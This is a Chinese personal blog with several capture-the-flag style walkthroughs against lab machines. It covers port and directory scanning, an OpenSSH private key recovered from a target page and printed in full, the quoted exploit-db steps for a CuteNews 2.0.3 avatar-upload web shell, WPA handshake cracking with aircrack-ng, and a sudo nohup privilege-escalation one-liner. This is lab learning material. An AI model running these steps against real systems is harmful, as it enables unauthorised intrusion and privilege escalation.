李乐意的博客

welcome to my blog~!

this is an example introduction. feel free to customize it!

add more lines to make it personal.

things i love:

  • coding
  • cats
  • coffee

tags:
@ 01/01/0001

端口扫描

服务探测

80端口下进有一张图片。查看图片详细信息。

wget http://192.168.30.136/main.gif
exiftool main.gif


File Name                       : main.gif                                                              09:06:12 [3/306]
Directory                       : .                                                                                     
File Size                       : 17 kB                                                                                 
File Modification Date/Time     : 2015:08:01 12:39:30-04:00                                                             
File Access Date/Time           : 2025:09:17 08:57:37-04:00
File Inode Change Date/Time     : 2025:09:17 08:55:21-04:00
File Permissions                : -rw-r--r--
File Type                       : GIF
File Type Extension             : gif
MIME Type                       : image/gif
GIF Version                     : 89a
Image Width                     : 235
Image Height                    : 302
Has Color Map                   : No
Color Resolution Depth          : 8
Bits Per Pixel                  : 1
Background Color                : 0
Comment                         : P-): kzMb5nVYJw  #是什么凭据吗?尝试一下base64
Image Size                      : 235x302
Megapixels                      : 0.071
echo "kzMb5nVYJw" | base64 -d
3X' #看起来不太像

目录爆破

gobuster dir -u http://192.168.30.136 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o buster/dir
/uploads              (Status: 301) [Size: 318] [--> http://192.168.30.136/uploads/]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.30.136/javascript/]
/phpmyadmin           (Status: 301) [Size: 321] [--> http://192.168.30.136/phpmyadmin/]

爆破出三个目录。

tags:
@ 01/01/0001

端口扫描

nmap --min-rate 10000 -p- 192.168.30.140 
nmap --min-rate 10000 -p22,80,81 -sT -sV -sC -O -oA scan/detail 192.168.30.140
nmap --min-rate 10000 -sU -p- -oA scan/udp 192.168.30.140
nmap --min-rate 10000 -script=vuln -p22,80 192.168.30.140  

端口发现22和80,漏洞扫描出一个目录。

image-20250923190413515

服务探测

image-20250923181258883

80端口:大logo,happy pwning:D(应该是个笑脸)。

http://192.168.30.140/d41d8cd98f00b204e9800998ecf8427e.php下面是个openssh私钥。

先破解一下。

vim id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA7T94TmbqiRlc6jGh6UOKyKVux+bYoskAdOybtgCfoh064CTHLTMT
HNnXWI8sT1Ml19svvVGnZZKmDTbS/7uOpgsmvO0pmqirCVo0UvD0YhKXVEwkTtmUvPBPAX
ucGRtefJcCtLWnSc4yMtzbYzSYEultUW5EfqqTwfjh48fxvLk1/kznO7EknxpLMupf6hJz
NbGLLbRwINeIjdC0k6iMdMrZ3n58Cho3kigNKSqcyBpkePE+RvnCBegtxBX/m1pUjPjYKY
zdZ0DROQyU3t7Wu6iX4TW688adHjAgXP7ERN0tL6RoJB9vHxO1GmGt5CLoJBYND1uLoTRe
p7xkIPwwgwAAA8iiu9/dorvf3QAAAAdzc2gtcnNhAAABAQDtP3hOZuqJGVzqMaHpQ4rIpW
7H5tiiyQB07Ju2AJ+iHTrgJMctMxMc2ddYjyxPUyXX2y+9UadlkqYNNtL/u46mCya87Sma
qKsJWjRS8PRiEpdUTCRO2ZS88E8Be5wZG158lwK0tadJzjIy3NtjNJgS6W1RbkR+qpPB+O
Hjx/G8uTX+TOc7sSSfGksy6l/qEnM1sYsttHAg14iN0LSTqIx0ytnefnwKGjeSKA0pKpzI
GmR48T5G+cIF6C3EFf+bWlSM+NgpjN1nQNE5DJTe3ta7qJfhNbrzxp0eMCBc/sRE3S0vpG
gkH28fE7UaYa3kIugkFg0PW4uhNF6nvGQg/DCDAAAAAwEAAQAAAQAaUzieOn07yTyuH+O/
Zmc37GNmew7+wR7z2m1MvLT54BRwWqRfN5OfV+y1Pu3Dv44rbX7WmwDgHG2gebzf84fYlN
QvkoFTT/Pqjb/QlDwJxdZU3D4LIcmHTYL2vyiLAKZzXK5ILv/pCKA5VJhjYaqeLpiauImR
JIxQsbUe+UixkATg7u3c/lkPH4p7POb7JJVbemKO07vzUSK3wzMWSukZs5ZZXKH8L5ypSy
CxPe4AUaO5IuXeKPeq45Q7lUvVKAFdxte438jup4YeyS7lbi2+BggJLt3W4jAlrWxaDhK3
/EICCIT8zLt+baltm/xrfiRM2OxTP2S/6/AQlkbSOaBBAAAAgQDTmKPk3pBpmR0tm5KmSK
6ubJkOfjcVwsLlZcVDHOcFIrgbNkEZPqqEnnRQD7BSBz0I05L1H8VgDR4ZkkgVqKmePhI9
Fs3NVsCasih8UubG2TTsGcvOalU+X6zagDiGWxxLNrQ81NBmCUBWPB/dFG+dUo9T0XigNQ
1lD1s4trUG6QAAAIEA/BlxOWPyLx4UHGO7RrrKEjWKpw2Ma6iRbQOo5HfmrJ+mZvUP+qBs
+Qgj3g+Qgt6y+EH67oxWeX/xTti1xHAc0Qx59181QrBFojp0XWtRumhASFC/TceBuP1fYe
DIZ6gYNXN/Pw7PFKStceO/Qhmee+K1/6XRwEvRSvXKG5a7sQ8AAACBAPDrM5bkjXYD9cq7
xfkT1t16YzqK9BmgFgSyOFQjtqFuLt4JtsQhPfip2QZkSCyPk8cVNx74Wvs4rxYl5pacmf
CR8v83WYMc6h4oBLmcxZsxMpaP8B/N7DZeS76A6idz+Cdj6BTmgMh7xFTXQOgB6Gh9LZmE
KXo/rW1gDQ8R+yFNAAAAC21wYW1waXNAbnl4AQIDBAUGBw==
-----END OPENSSH PRIVATE KEY-----
file id_rsa

不要忘记给文件600权限。SSH 客户端在连接时会严格检查私钥的权限。如果权限设置得过于开放(例如 777),它会认为私钥不安全,从而拒绝使用它进行连接。

tags:
@ 01/01/0001

端口扫描

nmap --min-rate 10000 -sn 192.168.30.0/24
nmap --min-rate 10000 -p- 192.168.30.142
nmap --min-rate 10000 -sU -p- -oA sacn/udp 192.168.30.142
nmap --min-rate 10000 -sT -sV -sC -O -p80,81 -oA scan/detail  192.168.30.142
nmap --min-rate 10000 -script=vuln -p80 -oA scan/vuln 192.168.30.142  

只开放了80端口。漏洞扫描暴漏两个路径:

| http-enum:                                                                              │└─$
|   /robots.txt: Robots file                                                              │
|_  /phpinfo.php: Possible information file   

服务探测

80端口下是ubuntu默认页。

robots.txt:

image-20250924111138547

莫名其妙的子串在CTF中经常会是个目录。访问成功。是sar2html3.2.1。该版本存在远程命令执行漏洞。

https://www.exploit-db.com/exploits/47204

image-20250924191239649

phpinfo.php

image-20250924111235496

image-20250924183731590

看配置文件信息

目录扫描

gobuster dir -u http://192.168.30.142 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt -o dir

image-20250924183743246

tags:
@ 01/01/0001

主机探测

nmap --min-rate 10000 -sn 192.168.30.0/24

image-20251126145037688

MAC Address: 00:50:56:F2:61:87 (VMware)
Nmap scan report for 192.168.30.155
Host is up (0.00010s latency).
MAC Address: 00:0C:29:1F:60:B4 (VMware)
Nmap scan report for 192.168.30.156

存在两台主机。

192.168.30.155

192.168.30.156

端口扫描

nmap --min-rate 10000 -sTVC -O -oA scan/detail155 192.168.30.155
nmap --min-rate 10000 -sTVC -O -oA scan/detail156 192.168.30.156

image-20251126145329731

仅对外开放了80端口。

服务探测

可以看到CMS指纹为CuteNews 2.0.3

注册账号然后登录。

image-20251126150440505

点击Help/About发现弹窗,说明该版本存在已知漏洞。

image-20251126150610568

漏洞探测

image-20251126150713342

控制台,能看到有文件上传、输入框。可以试一下SQL、XSS、文件上传。

这里因为对该CMS不够了解,先去找一下已知漏洞。

image-20251126150922033

很容易可以搜到。exploit-db上面有,那就直接用kali中的。

searchsploit CuteNews 2.0.3

image-20251126151142725

是一个txt文本,不是直接用的脚本。这个文本和浏览器搜到的编号是同一个,我就直接看浏览器了。

https://www.exploit-db.com/exploits/37474

          CuteNews 2.0.3 Remote File Upload Vulnerability
        =================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1               ##########################################             1
0               I'm T0x!c member from Inj3ct0r Team             1
1               ##########################################             0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1



# Exploit Title: CuteNews 2.0.3 Remote File Upload Vulnerability
# Date: [02/07/2015]
# Exploit Author: [T0x!c]
# Facebook: https://www.facebook.com/Dz.pr0s
# Vendor Homepage: [http://cutephp.com/]
# Software Link: [http://cutephp.com/cutenews/cutenews.2.0.3.zip]
# Version: [2.0.3] 
# Tested on: [Windows 7]
# greetz to :Tr00n , Kha&mix , Cc0de  , Ghosty , Ked ans , Caddy-dz .....
==========================================================
 # Exploit  :
 
Vuln : http://127.0.0.1/cutenews/index.php?mod=main&opt=personal
  
 1 - Sign up for New User
 2 - Log In 
 3 - Go to Personal options http://www.target.com/cutenews/index.php?mod=main&opt=personal
 4 - Select Upload Avatar Example: Evil.jpg
 5 - use tamper data  & Rename File Evil.jpg to Evil.php
  
-----------------------------2847913122899\r\nContent-Disposition: form-data; name="avatar_file"; filename="Evil.php"\r\

6 - Your Shell : http://127.0.0.1/cutenews/uploads/avatar_Username_FileName.php

 Example: http://127.0.0.1/cutenews/uploads/avatar_toxic_Evil.php
            

上传头像这里存在文件上传漏洞。

tags:
@ 01/01/0001

无线网密码破解

802.11无线网协议,SSID=‘dlink’。

image-20251021150820100

aircrack-ng -w /usr/share/wordlists/rockyou.txt WPA-01.cap

image-20251021150622006

密码p4ssword。

ssh登录

ssh dlink@192.168.30.153

提权

image-20251021151255120

sudo install -m =xs $(which nohup) .

./nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
./nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"